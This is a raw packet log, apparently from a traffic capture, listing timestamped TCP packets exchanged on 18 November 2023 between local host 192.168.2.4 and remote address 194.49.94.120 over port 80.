Nov 18, 2023 10:02:35.933594942 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933598042 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933612108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933624983 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933629036 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933645010 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933645964 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933664083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933680058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933686018 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933696985 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933713913 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933727026 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933732986 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933748960 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933751106 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933768034 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933784962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933790922 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933801889 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933819056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933825016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933835983 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933851957 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933852911 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933887959 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933907986 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933924913 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933940887 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933958054 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933974028 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933975935 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933990955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934009075 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934015989 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934027910 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934045076 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934045076 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934063911 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934067965 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934079885 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934096098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934097052 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934113026 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934129000 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934132099 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934145927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934163094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934174061 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934180021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934197903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934202909 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934215069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934225082 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934231997 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934251070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934267998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934281111 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934286118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934303045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934319973 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934320927 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934336901 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934348106 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934355021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934371948 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934377909 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934389114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934405088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934411049 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934422016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934439898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934453011 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934458017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934473991 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934480906 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934492111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934508085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934524059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934524059 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934540987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934557915 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934557915 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934573889 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934587002 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934588909 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934606075 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934624910 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934639931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934642076 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934657097 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934674025 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934674025 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934690952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934705019 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934708118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934724092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934741020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934757948 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934757948 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934775114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934792042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934799910 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934809923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934823036 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934828043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934844971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934850931 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934861898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934878111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934891939 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934894085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934911013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934928894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934928894 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934943914 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934957027 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934962034 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934978008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.934978962 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.934994936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935012102 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935020924 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935028076 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935045958 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935064077 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935066938 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935081005 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935095072 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935097933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935116053 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935123920 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935132027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935148954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935164928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935167074 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935182095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935198069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935200930 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935214996 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935230017 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935231924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935250044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935261965 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935266018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935278893 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935282946 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935298920 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935316086 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935319901 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935332060 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935348988 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935359955 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935364962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935380936 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935381889 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935398102 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935414076 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935417891 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935430050 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935447931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935455084 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935465097 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935481071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935483932 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935497999 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935513973 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935519934 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935532093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935549021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935565948 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935575008 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935581923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935599089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935601950 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935616016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935625076 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935631990 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935650110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935650110 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935666084 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935682058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935683012 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935698032 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935714960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935728073 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935730934 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935748100 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935750961 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935764074 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935781002 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935781956 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935796022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935805082 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935812950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935830116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935846090 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935853958 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935863972 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935877085 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935880899 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935898066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935914993 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935919046 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935930967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935946941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935946941 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.935964108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935980082 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.935996056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936002016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936012030 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936029911 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936045885 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936048031 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936063051 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936070919 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936080933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936098099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936115026 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936127901 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936135054 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936151028 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936167955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936172009 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936183929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936201096 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936203003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936219931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936223984 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936237097 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936253071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936256886 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936269045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936285973 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936302900 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936314106 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936320066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936335087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936352015 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936358929 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936368942 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936386108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936391115 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936402082 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936419010 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936420918 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936434984 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936444998 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936450958 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936466932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936484098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936496019 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936500072 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936517000 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936532974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936537027 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936549902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936567068 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936568975 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936583042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936590910 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936602116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936609983 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936619043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936638117 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936652899 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936656952 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936670065 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936686039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936692953 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936702013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936716080 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936717987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936733961 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936749935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936762094 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936765909 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936781883 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936799049 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936800957 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936815023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936825037 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936840057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936849117 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936855078 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936871052 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936887980 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936892986 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936903954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936922073 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936929941 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936939001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936950922 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936954975 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936973095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.936985016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.936989069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937005043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937019110 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937022924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937040091 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937056065 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937073946 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937083006 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937091112 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937108994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937124968 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937134027 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937141895 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937155962 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937158108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937175989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937180042 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937180042 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937194109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937210083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937227011 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937232971 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937252045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937261105 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937268972 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937285900 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937294960 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937303066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937319040 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937335968 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937342882 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937352896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937371016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937380075 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937390089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937402010 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937407017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937423944 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937442064 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937449932 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.937458992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937475920 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.937493086 CET	49744	80	192.168.2.4	194.49.94.120
